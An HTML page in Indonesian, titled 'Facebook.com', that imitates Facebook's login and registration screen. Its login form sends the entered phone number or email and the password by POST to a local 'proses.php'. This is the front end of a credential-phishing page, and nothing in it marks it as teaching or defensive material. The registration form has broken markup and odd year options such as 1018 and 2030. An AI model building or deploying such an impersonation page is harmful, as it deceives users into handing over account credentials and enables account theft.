<html>
<head>
<title> Facebook.com </title>
<link href="style1.css" rel="stylesheet" type="text/css"></head>
<body>

<form action ="proses.php" method="POST" name="input">

<div id="atas" align="right">
<div align="left">
</div>
<table border="0">
    <tr>
        <td><label id="masuk">Nomor atau email:</label></td>
        <td><label id ="masuk">Password:</label></td>
    </tr>
    <tr>
        <td><input id="name" name="username" placeholder="nomor atau email" type="text" required></td>
        <td><input id="pass" name="password" placeholder="password" type="password" required></td>
        <td><input name="submit" type="submit" value=" Masuk "></td>
    </tr>
    <tr>
        <td></td>
        <td><a href=""style ="text-decoration:none">Lupa akun?</a></td>
    </tr>
</table>
</div>
</form>

<form action="" Method ="POST" name="input">
<div id="samping" align="right">
<table border="0">

    <tr>
        <td><h1>Daftar</h1></td>

    </tr>
    <tr>
        <td><label> Gratis, Sampai Kapan Pun.</label></td>
    </tr>
    <tr>
        <td><input id="nama" name="depan" placeholder="Nama depan" type="text" required>
        <input id="nama" name="belakang" placeholder="Nama belakang" type="text" required></td>

    </tr>
    <tr>
        <td><input id="inputan" name="email" placeholder="Masukkan nomor seluler atau email" type="text" required></td>
    </tr>
     <tr>
        <td><input id="inputan" name="email" placeholder="Masukkan ulang nomor seluler" type="text" required></td>
    </tr>
     <tr>
        <td><input id="inputan" name="email" placeholder="Kata sandi baru" type="password" required></td>
    </tr>
    <tr>
    <td>Tanggal Lahir</td>
    </tr>
    </table>
<table id ="tengah">
    <tr>
    <td>
    <select name ="Tanggal">
<option value = ""> Tanggal</option>
<option value = "Tanggal"> 1 </option><option value = "Tanggal"> 2 </option>
<option value = "Tanggal"> 3 </option><option value = "Tanggal"> 4 </option><option value = "Tanggal"> 5 </option>
<option value = "Tanggal"> 6 </option><option value = "Tanggal"> 7 </option><option value = "Tanggal"> 8 </option>
<option value = "Tanggal"> 9 </option><option value = "Tanggal"> 10 </option><option value = "Tanggal"> 11 </option>
<option value = "Tanggal"> 12 </option><option value = "Tanggal"> 13 </option><option value = "Tanggal"> 14 </option>
<option value = "Tanggal"> 15 </option><option value = "Tanggal"> 16 </option><option value = "Tanggal"> 17 </option>
<option value = "Tanggal"> 18 </option><option value = "Tanggal"> 19 </option><option value = "Tanggal"> 20 </option>
<option value = "Tanggal"> 21 </option><option value = "Tanggal"> 22 </option><option value = "Tanggal"> 23 </option>
<option value = "Tanggal"> 24 </option><option value = "Tanggal">25 </option><option value = "Tanggal"> 26 </option>
<option value = "Tanggal"> 27 </option><option value = "Tanggal"> 28 </option><option value = "Tanggal"> 29 </option>
<option value = "Tanggal"> 30 </option><option value = "Tanggal"> 31 </option>
</select>

<select name ="Bulan">
<option value = ""> Bulan </option>
<option value = "Bulan"> Januari </option><option value = "Bulan"> Febuari </option><option value = "Bulan"> Maret </option>
<option value = "Bulan"> April </option><option value = "Bulan"> Mei </option><option value = "Bulan"> Juni </option>
<option value = "Bulan"> Juli </option><option value = "Bulan"> Agustus </option><option value = "Bulan"> September</option>
<option value = "Bulan"> Oktober </option><option value = "Bulan"> November </option><option value = "Bulan"> Desember </option>
</select>

<select name ="Tahun">
<option value = ""> Tahun </option>
<option value = "Tahun"> 1987 </option><option value = "Tahun"> 1988 </option><option value = "Tahun"> 1989</option>
<option value = "Tahun"> 1990 </option><option value = "Tahun"> 1991 </option><option value = "Tahun"> 1992 </option>
<option value = "Tahun"> 1993 </option><option value = "Tahun"> 1994 </option><option value = "Tahun"> 1995 </option>
<option value = "Tahun">1996</option><option value = "Tahun"> 1997 </option><option value = "Tahun"> 1998 </option>
<option value = "Tahun"> 1999 </option><option value = "Tahun"> 2000 </option><option value = "Tahun"> 2001 </option>
<option value = "Tahun"> 2002 </option><option value = "Tahun"> 2003 </option><option value = "Tahun"> 2004 </option>
<option value = "Tahun"> 2005 </option><option value = "Tahun"> 2006 </option><option value = "Tahun"> 2008 </option>
<option value = "Tahun"> 2009 </option><option value = "Tahun"> 2010 </option><option value = "Tahun"> 2011 </option>
<option value = "Tahun"> 2012 </option><option value = "Tahun"> 2013 </option><option value = "Tahun"> 2014 </option>
<option value = "Tahun"> 2015 </option><option value = "Tahun"> 2016 </option><option value = "Tahun"> 2017 </option>
<option value = "Tahun"> 1018 </option><option value = "Tahun"> 2019 </option><option value = "Tahun"> 2030 </option>
</select>
</td>

<td><label id ="saya">mengapa saya harus<br> memberikan tanggal<br> lahir saya ?</label></td>
</tr>
<tr>
<td><input id ="perempuan" name ="perempuan" value ="perempuan" type = "radio" >
<label>Perempuan</label>
<input id ="pria" name ="pria" value ="pria" type = "radio" >
<label>Pria</label></td>
</tr>
<tr>
<td><label id="komen">Dengan mengetik Buat akun, Anda harus menyetujui ketentuan kami<br>
dan bahwa Anda telah membaca kebijakan Data kami, termasuk<br>
Penggunaan Kuki</label></td>
</tr>
<tr>
<td> <input id="tombol"  name="submit" type="submit" value=" Buat Akun "></td>
</tr>
</form>

</table>
</div>
</div>
</body>
</html>
